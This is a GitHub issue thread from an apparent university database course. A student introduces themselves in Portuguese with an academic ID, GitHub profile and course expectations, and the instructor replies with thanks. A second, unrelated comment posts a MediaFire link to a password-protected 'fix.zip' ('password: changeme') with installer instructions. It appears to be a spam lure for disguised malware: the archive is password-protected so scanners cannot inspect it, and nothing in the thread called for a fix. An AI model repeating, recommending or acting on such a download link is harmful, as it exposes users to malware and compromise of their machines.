### ISSUE TITLE
Tópico 1

### ISSUE THREAD

**Issue by lrcordeiro007** [plinioleitao/bd-2024-2-bcc#11]
Meu registro acadêmico: 202301466
Minha no GitHub: https://github.com/lrcordeiro007
Minhas expectativas com respeito à disciplina: Conheço muito pouco da teoria de banco de dados e gostaria de entender melhor e dominar minimamente a programação deles, ainda mais que é uma área que tem grande importância no mercado de trabalho.

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by plinioleitao** [comment]
Obrigado pela resposta e comentários.
